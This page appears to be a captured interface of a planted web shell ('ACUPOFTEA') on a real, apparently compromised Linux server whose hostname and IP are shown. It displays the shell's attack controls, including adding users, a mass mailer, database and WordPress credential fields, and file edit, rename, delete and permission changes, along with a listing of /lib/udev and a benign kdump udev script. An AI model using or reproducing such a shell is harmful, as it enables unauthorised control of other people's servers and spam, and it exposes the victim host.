System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib
/
udev
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
kdump-udev-throttler
#!/bin/bash # This util helps to reduce the workload of kdump service restarting # on udev event. When hotplugging memory / CPU, multiple udev # events may be triggered concurrently, and obviously, we don't want # to restart kdump service for each event. # This script will be called by udev, and make sure kdump service is # restart after all events we are watching are settled. # On each call, this script will update try to aquire the $throttle_lock # The first instance acquired the file lock will keep waiting for events # to settle and then reload kdump. Other instances will just exit # In this way, we can make sure kdump service is restarted immediately # and for exactly once after udev events are settled. throttle_lock="/var/lock/kdump-udev-throttle" exec 9>$throttle_lock if [ $? -ne 0 ]; then echo "Failed to create the lock file! Fallback to non-throttled kdump service restart" /bin/kdumpctl reload exit 1 fi flock -n 9 if [ $? -ne 0 ]; then echo "Throttling kdump restart for concurrent udev event" exit 0 fi # Wait for at least 1 second, at most 4 seconds for udev to settle # Idealy we will have a less than 1 second lag between udev events settle # and kdump reload sleep 1 && udevadm settle --timeout 3 # Release the lock, /bin/kdumpctl will block and make the process # holding two locks at the same time and we might miss some events exec 9>&- /bin/kdumpctl reload exit 0
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-04-23 10:58:40
..
DIR
-
dr-xr-xr-x
2025-09-30 10:57:16
hwdb.d
DIR
-
drwxr-xr-x
2025-04-23 10:57:57
rules.d
DIR
-
drwxr-xr-x
2025-08-28 10:58:31
ata_id
application/x-sharedlib
40.73 KB
-rwxr-xr-x
2025-04-22 01:58:57
cdrom_id
application/x-sharedlib
32.51 KB
-rwxr-xr-x
2025-04-22 01:58:57
collect
application/x-sharedlib
20.57 KB
-rwxr-xr-x
2025-04-22 01:58:57
fc_wwpn_id
text/x-shellscript
1.1 KB
-rwxr-xr-x
2022-10-08 11:49:23
fido_id
application/x-sharedlib
16.43 KB
-rwxr-xr-x
2025-04-22 01:58:57
kdump-udev-throttler
text/x-shellscript
1.41 KB
-rwxr-xr-x
2024-09-24 08:36:00
kpartx_id
text/x-shellscript
2.33 KB
-rwxr-xr-x
2025-04-22 01:55:39
mtd_probe
application/x-sharedlib
12.41 KB
-rwxr-xr-x
2025-04-22 01:58:57
prefixdevname
application/x-sharedlib
1.46 MB
-rwxr-xr-x
2019-12-16 07:52:38
rename_device
application/x-sharedlib
16.45 KB
-rwxr-xr-x
2022-10-08 11:08:06
scsi_id
application/x-sharedlib
53.7 KB
-rwxr-xr-x
2025-04-22 01:58:57
v4l_id
application/x-sharedlib
11.99 KB
-rwxr-xr-x
2025-04-22 01:58:57
~ ACUPOFTEA - mail.ontime-ae.com